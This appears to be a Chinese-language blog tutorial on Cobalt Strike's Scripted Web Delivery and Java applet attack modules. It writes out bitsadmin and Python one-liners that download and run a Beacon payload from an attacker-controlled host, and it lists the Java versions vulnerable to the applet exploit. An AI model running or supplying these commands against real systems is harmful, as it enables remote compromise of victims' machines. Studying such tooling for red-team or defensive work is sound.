CobaltStrike’s Scripted Web Delivery

Scripted Web Delivery (S)介绍实战

  该能供可以生成一个无阶段的Beacon,也就是不需要stager的payload。同样需要CS创建一个web服务器来托管这个文件,并需要为目标主机提供一个方法来下载和运行此Beacon,包括bitsadmin,powershell 和 python。

image-20210308185141862

  • bitsadmin.exe:如果你的目标系统是Windows 7及以上操作系统,你可以使用bitsadmin命令,一个命令行工具,可用于创建下载上传进程。bitsadmin 方法通过 cmd.exe 来运行此可执行文件。

cmd.exe /c bitsadmin /transfer 3fbc http://192.168.222.134:80/attack %APPDATA%\3fbc.exe&%APPDATA%\3fbc.exe&del %APPDATA%\3fbc.exe

#在目标主机上打开”运行”执行代码,便会从CS web服务器上下载payload并运行。

image-20210308185152141

  • Powershell:这玩意就不多说了,改日做个Powershell的章节

  • Python:使用exec命令执行储存在字符串或文件中的Python语句。Urllib2则是python2.7自带的库,常用于爬虫。

    python -c “import urllib2; exec urllib2.urlopen(‘http://192.168.222.134:80/a').read();"

钓鱼攻击模块收尾

Java Signed Applet Attack和Java Smart Applet Attack

  • Java Signed Applet Attack:签名Applet攻击,这个攻击会启动一个 web 服务器来托管一个自签名的 Java applet。访客被要求给这个 applet 权限来运行。当一个访客准许了这个权限,你就获取了到他们系统的权限。
    • Java applet:用Java语言编写的小应用程序,可以直接嵌入到网页中,并能够产生特殊的效果。
  • Java Smart Applet Attack:智能Applet攻击,这个applet分析它的环境并决定使用哪个Java漏洞利用。如果Java版本是有漏洞的,此applet会禁用安全沙箱,并使用Cobalt Strike的Java注入器执行payload。

The Smart Applet detects the Java version and uses an embedded exploit to disable the Java security sandbox. This attack is cross-platform and cross-browser.

Vulnerable Java Versions

Java 1.6.0_45 and below

Java 1.7.0_21 and below

  • 这两攻击就不太想尝试了,因为很少很少有主机会存在applet的运行环境。